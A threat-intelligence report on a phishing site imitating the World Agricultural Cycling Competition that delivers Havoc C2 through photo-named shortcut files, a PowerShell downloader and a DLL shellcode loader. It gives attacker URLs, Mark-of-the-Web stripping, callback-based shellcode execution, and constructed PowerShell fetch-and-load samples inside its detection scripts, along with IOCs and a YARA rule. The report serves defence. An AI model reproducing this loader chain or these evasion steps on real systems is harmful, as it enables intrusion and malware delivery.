Key Takeaways
- Cyble Research and Intelligence Labs (CRIL) recently identified a phishing website that closely mimics the official website of the World Agricultural Cycling Competition (WACC).
- This deceptive website was crafted by a Threat Actor (TA) who replicated the legitimate WACC website with only minor modifications, making it difficult for unsuspecting visitors to distinguish between the two.
- The World Agricultural Cycling Competition is an event held in France that aims to bridge the gap between the agriculture and sports industries. The timing and context suggest that the TA is likely targeting stakeholders and participants within this specific region and sector, aiming to exploit the event's popularity and relevance.
- The phishing campaign was deliberately launched in July 2024, shortly after the real cycling event concluded in June. By capitalizing on the event's recent conclusion, the TA added a "PHOTO" section to the phishing website, enticing visitors with the promise of event photos and thereby luring those associated with or interested in the competition.
- To further their malicious agenda, the TA lures users into downloading a ZIP file that allegedly contains event photos. However, instead of photos, the ZIP file harbors three shortcut files (.lnk) disguised as images. When executed, these shortcuts trigger a sophisticated infection chain that ultimately delivers a Havoc C2.
- Once the Havoc C2 is executed, it attempts to establish communication with an Azure Front Door domain. This domain is likely being used as a redirector, serving as an intermediary that reroutes traffic to the actual Command and Control (C&C) server, from which the TA can carry out further malicious actions.
Overview
CRIL has identified a phishing website hosted at "wacc[.]photo" that is masquerading as the official website for the World Agricultural Cycling Competition. The TA responsible for this phishing website has cloned the legitimate website, making only minor alterations to its content. The real cycling event took place from June 7th to 9th, after which the TA launched their attack campaign.
The TA added a new section titled "PHOTO," claiming to offer event photos in order to lure visitors. This addition appears to be a strategic move aimed at targeting individuals associated with the event who might be eager to view or download these photos. The figure below illustrates the appearance of the phishing website.
The figure below illustrates the new section added by the TA, which provides the option to download a malicious ZIP file disguised as event photos.
The ZIP file in question contains three shortcut files (.lnk) that are disguised as images. When a user clicks on any of these shortcuts, a PowerShell script is executed. This script is designed to download legitimate images and display them using the Edge browser, thereby maintaining the illusion of authenticity. However, the script also downloads and executes a malicious DLL file in the background.
This DLL acts as a loader and loads shellcode that is responsible for loading the Havoc C2. Havoc is a sophisticated post-exploitation Command and Control (C&C) framework. Once deployed, the Havoc C2 attempts to connect to an Azure Front Door domain, which the TA likely uses as a redirector to the actual C&C server. During the analysis, it was observed that the C&C server was down, which hindered the ability to fully analyze the subsequent stages of the attack.
This phishing website also hosts an open directory containing various malware payloads used to deliver Havoc. The TA may be swapping out payloads to better target their victims.
Technical Analysis
The initial infection begins when a user downloads a ZIP file from the phishing website. This ZIP file contains three shortcut files disguised with .jpg extensions to appear as image files, as depicted in the figure below.
Each of these shortcut files is designed to execute the same operation. Upon execution, they utilize conhost.exe to run a PowerShell script. This script initially downloads a legitimate JPG file using the Start-BitsTransfer command, which serves as a decoy. Specifically:
- 1.jpg.lnk downloads from hxxps[:]//wacc.photo/wp-content/uploads/2024/1.jpg
- 2.jpg.lnk downloads from hxxps[:]//wacc.photo/wp-content/uploads/2024/2.jpg
- 3.jpg.lnk downloads from hxxps[:]//wacc.photo/wp-content/uploads/2024/3.jpg
These decoy images are placed in the "AppData\Local" directory. Subsequently, the script uses Microsoft Edge to open these images with the following command:
- cmd.exe /C 'C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe' C:\Users\User_Name\AppData\Local\[image_name].jpg;
The figure below shows the decoy image.
The PowerShell script for downloading and displaying the decoy images is illustrated in the figure below.
After this, the PowerShell script downloads a DLL file from "hxxps[:]//wacc.photo/wp-content/uploads/2024/KB.crdownload" and saves it in the Downloads folder, naming it "KB.part." It then moves this file to "AppData\Local" and renames it "KB.DLL." Next, it uses the Unblock-File command to strip the Mark-of-the-Web from the downloaded file so that it can be executed. The figure below shows the PowerShell script for downloading the DLL.
Now, this PowerShell script loads "KB.DLL" into its own process and then invokes the Run method within the DLL to initiate its execution. The figure below shows the code for loading the DLL file.
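The delivery stage described so far (a ZIP of photo-named shortcuts that launch PowerShell through conhost.exe and fetch content with Start-BitsTransfer) can be triaged before anyone double-clicks. The Python script below is an added example written for this page, not code from Cyble or from the sample itself. It builds a constructed archive in memory (the shortcut payload and the example.invalid host are invented placeholders) and flags members that carry a double image/.lnk extension, begin with the ShellLink file header, or embed script-launching strings.

```python
import io
import re
import struct
import zipfile

# A ShellLink (.lnk) file starts with HeaderSize 0x4C followed by the ShellLink
# CLSID 00021401-0000-0000-C000-000000000046 (MS-SHLLINK section 2.1).
LNK_MAGIC = struct.pack("<I", 0x4C) + bytes.fromhex("0114020000000000c000000000000046")

IMAGE_EXTS = (".jpg", ".jpeg", ".png", ".gif", ".bmp")

# Strings that, inside a shortcut, point to a script launcher rather than a
# plain file link; the chain above used conhost.exe, PowerShell and BITS.
SUSPICIOUS_PATTERNS = [
    re.compile(p, re.IGNORECASE)
    for p in (
        r"conhost\.exe",
        r"powershell",
        r"Start-BitsTransfer",
        r"Unblock-File",
        r"-encodedcommand|-enc\b",
        r"cmd(\.exe)?\s+/c",
    )
]


def lnk_text(data: bytes) -> str:
    """Return the ASCII and UTF-16LE text of a shortcut as one searchable string.
    LNK string data is usually UTF-16LE, so both decodings are tried."""
    return data.decode("latin-1") + "\n" + data.decode("utf-16-le", errors="ignore")


def inspect_entry(name: str, data: bytes) -> dict:
    """Classify one archive member by its name and by its content."""
    lower = name.lower()
    double_ext = lower.endswith(".lnk") and lower[:-4].endswith(IMAGE_EXTS)
    is_lnk = data.startswith(LNK_MAGIC)
    text = lnk_text(data) if is_lnk else ""
    hits = sorted({p.pattern for p in SUSPICIOUS_PATTERNS if p.search(text)})
    return {
        "name": name,
        "double_extension": double_ext,
        "is_lnk": is_lnk,
        "suspicious_strings": hits,
        "verdict": "suspicious" if double_ext or (is_lnk and hits) else "clean",
    }


def triage_zip(zip_bytes: bytes) -> list:
    """Inspect every file member of a ZIP held in memory."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        return [inspect_entry(i.filename, zf.read(i)) for i in zf.infolist() if not i.is_dir()]


def build_sample_zip() -> bytes:
    """Constructed test archive (not the real sample): one JPEG stub and one
    shortcut named like a photo whose UTF-16LE payload resembles a
    script-launching command line. The host example.invalid is a placeholder."""
    fake_cmd = ('conhost.exe powershell -w hidden -c "Start-BitsTransfer '
                '-Source https://example.invalid/uploads/1.jpg"')
    fake_lnk = LNK_MAGIC + b"\x00" * 56 + fake_cmd.encode("utf-16-le")
    jpeg_stub = b"\xff\xd8\xff\xe0" + b"\x00" * 16 + b"\xff\xd9"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("photos/1.jpg.lnk", fake_lnk)
        zf.writestr("photos/real.jpg", jpeg_stub)
    return buf.getvalue()


if __name__ == "__main__":
    for result in triage_zip(build_sample_zip()):
        print(f"{result['verdict']:10} {result['name']}  {result['suspicious_strings']}")
```

The name check alone already catches the `1.jpg.lnk` pattern used here, but the header check matters when Explorer hides the `.lnk` suffix, and the string scan catches shortcuts that were renamed to something innocuous. Both decodings are searched because LNK command-line data is stored as UTF-16LE, which a plain ASCII grep would miss.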
This "KB.DLL" is a shellcode loader. It contains obfuscated shellcode and a dictionary of words mapped to bytes. A function named DecodeWordsToBytes() reverses this mapping, converting the words back into their original byte values.
After de-obfuscating the shellcode, the ExecuteShellcode() method is called to execute it. This method allocates executable memory, copies the shellcode into it, and then abuses the EnumFontsW() function to run the shellcode under the pretext of enumerating fonts. Since EnumFontsW() takes a callback function, the pointer to the shellcode is passed to it as that callback and is executed. The method then cleans up by releasing the device context. This is a common technique used in malware to execute payloads while attempting to evade detection. The shellcode contains an embedded executable, as shown in the figure below.
This shellcode, upon execution, searches for the PE header, as depicted in the figure below. Embedded within the shellcode is a Havoc C2 agent, which is loaded and designed to establish a connection to the domain egzklpzltbptmgnnevne[.]azurefd.net. This domain belongs to Azure Front Door, a content delivery network (CDN) service provided by Microsoft Azure. TAs have previously been observed abusing similar legitimate services to evade detection. At the time of analysis, this domain was down, which prevented further investigation of subsequent stages.
Conclusion
This attack appears to have been deliberately aimed at the French agricultural sector. Although the command and control (C&C) server was inactive during the analysis, preventing a complete understanding of the threat actor's objectives, there are several potential implications based on the infection chain that was observed.
The deployment of Havoc indicates that the TA likely intended to carry out extensive and sophisticated operations. Havoc, as a post-exploitation framework, is capable of enabling a range of malicious activities. These could include lateral movement within the compromised network, allowing the attacker to infiltrate additional systems, establishing persistence to ensure long-term access, and deploying further malware payloads to deepen the compromise or achieve specific objectives. The sophistication of the Havoc framework suggests that the attacker was well-prepared and possibly had a strategic interest in compromising systems within the French agricultural industry.
Our Recommendations
- The TA has created a phishing website posing as WACC. To protect yourself, verify the legitimacy of websites by scrutinizing URLs and avoiding suspicious links.
- Conduct training sessions to educate users on recognizing phishing attempts and the risks of downloading files from untrusted sources. Emphasize the importance of verifying the legitimacy of websites and links before interacting with them.
- Configure PowerShell execution policies to restrict the running of scripts from untrusted sources. Use controls such as PowerShell Constrained Language Mode to limit PowerShell capabilities and reduce the risk of malicious script execution.
- Deploy advanced endpoint protection solutions that can detect and block malicious DLLs and scripts. Ensure that the antivirus and antimalware software used by your organization is up to date and configured to scan for potentially harmful files.
- Set up network monitoring to detect unusual traffic patterns, such as connections to suspicious domains or unexpected communications with Azure Front Door domains. Investigate any anomalies promptly.
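The last three recommendations, together with the Azure Front Door redirector noted in the technical analysis, translate into concrete detection logic. The Python below is an added example written for this page (it is not Cyble's tooling and not part of the original post). It scores constructed PowerShell script-block text and constructed process-to-network records against the stages of the chain described above: a BITS download from an external URL, the .crdownload artefact, a rename to .dll, Unblock-File, an in-process reflective assembly load, and a script host talking to an *.azurefd.net edge. The record shapes, the example.invalid host and the placeholder azurefd.net hostname are all assumptions made for the demonstration.

```python
import re
from typing import Optional

# Script-block patterns, one per stage of the chain described above.
SCRIPT_RULES = {
    "bits_download_external": re.compile(r"Start-BitsTransfer\b[^\n;]*-Source\s+https?://", re.I),
    "crdownload_artifact": re.compile(r"\.crdownload\b", re.I),
    "rename_to_dll": re.compile(r"(Move-Item|Rename-Item|Copy-Item)\b[^\n;]*\.dll\b", re.I),
    "unblock_file": re.compile(r"\bUnblock-File\b", re.I),
    "reflective_assembly_load": re.compile(r"\[(System\.)?Reflection\.Assembly\]::Load", re.I),
}
# Three or more stages in one script block is treated as the full loader chain;
# a single stage is merely worth a look (Unblock-File has legitimate uses).
CHAIN_THRESHOLD = 3

# Interpreters and LOLBins that should not normally talk to a CDN edge directly.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "conhost.exe",
                "rundll32.exe", "mshta.exe", "wscript.exe", "cscript.exe"}


def score_script_block(text: str) -> dict:
    """Return the matched stage names and a verdict for one script block."""
    stages = [name for name, rx in SCRIPT_RULES.items() if rx.search(text)]
    if len(stages) >= CHAIN_THRESHOLD:
        verdict = "loader_chain"
    elif stages:
        verdict = "suspicious"
    else:
        verdict = "benign"
    return {"stages": stages, "verdict": verdict}


def check_network_event(event: dict) -> Optional[str]:
    """Flag a script host connecting to an Azure Front Door (*.azurefd.net) edge.
    `event` is a constructed record: {"image": path, "dest_host": str, "dest_port": int}."""
    image = event["image"].rsplit("\\", 1)[-1].lower()
    host = event["dest_host"].lower().rstrip(".")
    if image in SCRIPT_HOSTS and host.endswith(".azurefd.net"):
        return f"script_host_to_front_door: {image} -> {host}:{event['dest_port']}"
    return None


# Constructed sample records (not real telemetry); hosts are placeholders.
SAMPLE_SCRIPT_BLOCKS = {
    "admin_cleanup": (
        "Get-ChildItem C:\\Logs -Filter *.log | "
        "Where-Object LastWriteTime -lt (Get-Date).AddDays(-30) | Remove-Item"
    ),
    "decoy_and_loader": (
        "Start-BitsTransfer -Source https://example.invalid/uploads/1.jpg "
        "-Destination $env:LOCALAPPDATA\\1.jpg; "
        "Start-BitsTransfer -Source https://example.invalid/uploads/KB.crdownload "
        "-Destination $env:USERPROFILE\\Downloads\\KB.part; "
        "Move-Item $env:USERPROFILE\\Downloads\\KB.part $env:LOCALAPPDATA\\KB.dll; "
        "Unblock-File $env:LOCALAPPDATA\\KB.dll; "
        "[System.Reflection.Assembly]::LoadFile(\"$env:LOCALAPPDATA\\KB.dll\")"
    ),
}
SAMPLE_NETWORK_EVENTS = [
    {"image": "C:\\Program Files\\Mozilla Firefox\\firefox.exe",
     "dest_host": "static.example.invalid", "dest_port": 443},
    {"image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe",
     "dest_host": "placeholder-redirector.azurefd.net", "dest_port": 443},
]


def triage(script_blocks: dict, network_events: list) -> dict:
    """Run both checks and collect everything worth an analyst's attention."""
    return {
        "scripts": {k: score_script_block(v) for k, v in script_blocks.items()},
        "network": [f for f in map(check_network_event, network_events) if f],
    }


if __name__ == "__main__":
    report = triage(SAMPLE_SCRIPT_BLOCKS, SAMPLE_NETWORK_EVENTS)
    for name, res in report["scripts"].items():
        print(f"{name}: {res['verdict']} {res['stages']}")
    for finding in report["network"]:
        print(finding)
```

Script-block text of this kind is only available if PowerShell Script Block Logging (event 4104) is enabled, and the network check needs process-attributed connection telemetry such as Sysmon event 3; both are prerequisites the recommendations above imply. The Front Door rule is intentionally narrow (script hosts only), since browsers and Microsoft services legitimately reach *.azurefd.net all day.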
MITRE ATT&CK® Techniques
| Tactic | Technique | Procedure |
| --- | --- | --- |
| Initial Access (TA0001) | Phishing (T1566) | Uses a phishing website. |
| Execution (TA0002) | User Execution: Malicious File (T1204.002) | The user executes a .LNK file disguised as an image. |
| Execution (TA0002) | Command and Scripting Interpreter: PowerShell (T1059.001) | Embedded PowerShell commands are executed. |
| Defense Evasion (TA0005) | Masquerading: Masquerade File Type (T1036.008) | LNK file disguised as a JPG file. |
| Defense Evasion (TA0005) | Obfuscated Files or Information (T1027) | Contains obfuscated shellcode. |
| Command and Control (TA0011) | Application Layer Protocol: Web Protocols (T1071.001) | Uses HTTP to communicate. |
Indicators of Compromise (IOCs)
| Indicator | Indicator Type | Description |
| --- | --- | --- |
| 7566a8bce13dcbf1137b44776711ac2c471cf54a8bd7891c5b00b091f2aaa796 | SHA256 | GAGNANTS_CONCOURS_2024.zip |
| da9122c56c0da8f4e336f811435783b22994a9109162f3be6558aed7ac1c08da | SHA256 | 1.jpg.lnk |
| 3a169ce08fa1ab70f452c2bdfe3638805579a5cca1b45eb8ce81f68c98c932da | SHA256 | 2.jpg.lnk |
| 43cfef5db47162dda0c11320d3fcee76ef83308a7d0b7c9afd16c8dd974834a7 | SHA256 | 3.jpg.lnk |
| d9b4ed0f77045b79989b31fa32fdb1b461e9602d0c150a4052f9ae6a79a98ff5 | SHA256 | KB.dll |
YARA Rule
rule Loader_Havoc
{
    meta:
        author = "Cyble Research and Intelligence Labs"
        description = "Detects DLL loader used to deliver Havoc payload"
        date = "2024-08-14"
        os = "Windows"
    strings:
        $a1 = "ExecuteShellcode" fullword ascii
        $a2 = "GetDCEx" fullword ascii
        $a3 = "EnumFontsW" fullword ascii
        $a4 = "ReleaseDC" fullword ascii
    condition:
        uint16(0) == 0x5A4D and all of them
}